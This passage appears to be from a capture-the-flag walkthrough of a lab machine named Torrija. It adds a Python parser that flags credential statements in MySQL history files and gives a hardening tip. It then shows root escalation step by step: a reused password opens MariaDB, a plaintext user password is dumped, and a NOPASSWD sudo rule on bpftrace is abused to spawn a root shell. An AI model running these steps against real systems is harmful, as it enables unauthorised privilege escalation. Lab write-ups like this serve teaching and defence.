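The `\040` sequences are libedit's history escaping (three-digit octal for whitespace, `\\` for a backslash), which is why `echo -e` decodes them. As an added example for this walkthrough, the following parser does the same in Python and goes one step further than the file above: it flags statements that would embed credentials, the reason a reviewer should care about these files in the first place. The sample text is a constructed copy of the history above plus one made-up `create user` line; the assumption is that only the octal and backslash escape forms occur.

```python
import re

HISTORY_HEADER = "_HiStOrY_V2_"

# Constructed copy of the history file shown above, with one extra made-up
# statement. A raw string keeps the backslashes literal, as they are on disk.
SAMPLE_HISTORY = r"""_HiStOrY_V2_
show\040databases;
use\040Torrijas;
show\040tables;
select\040*\040from\040primo;
create\040user\040'app'@'localhost'\040identified\040by\040'hunter2';
exit;
"""

# libedit writes history with strvis()-style escaping: whitespace and other
# non-printable bytes become three-digit octal (\040 = space, \011 = tab) and a
# literal backslash becomes '\\'. Only those two forms are handled here (assumption).
_ESCAPE_RE = re.compile(r"\\([0-7]{3}|\\)")

# Fragments that usually mean a credential was typed in clear text.
SECRET_KEYWORDS = ("identified by", "password(", "set password", "grant ")


def unescape_libedit(text):
    """Decode one escaped history line back to the command as typed."""
    def repl(m):
        token = m.group(1)
        return "\\" if token == "\\" else chr(int(token, 8))
    return _ESCAPE_RE.sub(repl, text)


def parse_mysql_history(raw):
    """Return the list of decoded statements from a libedit V2 history file."""
    lines = raw.splitlines()
    if not lines or lines[0] != HISTORY_HEADER:
        raise ValueError("not a libedit V2 history file")
    return [unescape_libedit(line) for line in lines[1:] if line]


def find_secret_statements(commands):
    """Return statements likely to contain a password or a privilege grant."""
    return [c for c in commands if any(k in c.lower() for k in SECRET_KEYWORDS)]


if __name__ == "__main__":
    commands = parse_mysql_history(SAMPLE_HISTORY)
    for c in commands:
        print(c)
    print("review:", find_secret_statements(commands))
```

The hardening counterpart is simple: the MariaDB client honours `MYSQL_HISTFILE=/dev/null`, and the history is also skipped for statements matching `MYSQL_HISTIGNORE`, so accounts that administer users should not leave a readable `.mysql_history` behind at all.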

Root privilege escalation

This looks like it hands us a MySQL password,

but it is actually a big trap, and I was stuck here for a while.

You simply cannot log in with it.

In the end, trying the admin account's password works.

Call it credential stuffing: one password for everything, haha.

premo@Torrija-TheHackersLabs:~$ mysql -uroot -pafdvasgvfdsabdgvs6a9vd8sv
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 12858
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| Torrijas |
| information_schema |
| mysql |
| performance_schema |
| sys |
| wordpress |
+--------------------+
6 rows in set (0,007 sec)

MariaDB [(none)]> use Torrijas;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [Torrijas]> show tables;
+--------------------+
| Tables_in_Torrijas |
+--------------------+
| primo |
+--------------------+
1 row in set (0,000 sec)

MariaDB [Torrijas]> select * from primo;
+----+---------+----------------+
| id | usuario | contraseña |
+----+---------+----------------+
| 1 | primo | queazeshurmano |
+----+---------+----------------+
1 row in set (0,000 sec)

MariaDB [Torrijas]> exit
Bye
premo@Torrija-TheHackersLabs:~$ su primo
Contraseña:
primo@Torrija-TheHackersLabs:/home/premo$ id
uid=1001(primo) gid=1001(primo) grupos=1001(primo)
primo@Torrija-TheHackersLabs:/home/premo$ sudo -l
sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido
Matching Defaults entries for primo on Torrija-TheHackersLabs:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User primo may run the following commands on Torrija-TheHackersLabs:
(root) NOPASSWD: /usr/bin/bpftrace

bpftrace can be used to escalate to root directly.

primo@Torrija-TheHackersLabs:/home/premo$ sudo bpftrace -c /bin/sh -e 'END {exit()}'
sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido
Attaching 1 probe...
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
f3e431cd1129e9879e482fcb2cc151e8 -
#
